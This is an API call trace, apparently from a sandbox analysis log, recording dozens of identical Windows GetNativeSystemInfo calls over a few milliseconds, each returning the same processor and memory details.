	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.716] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.717] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.718] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.719] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.720] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.721] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.722] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
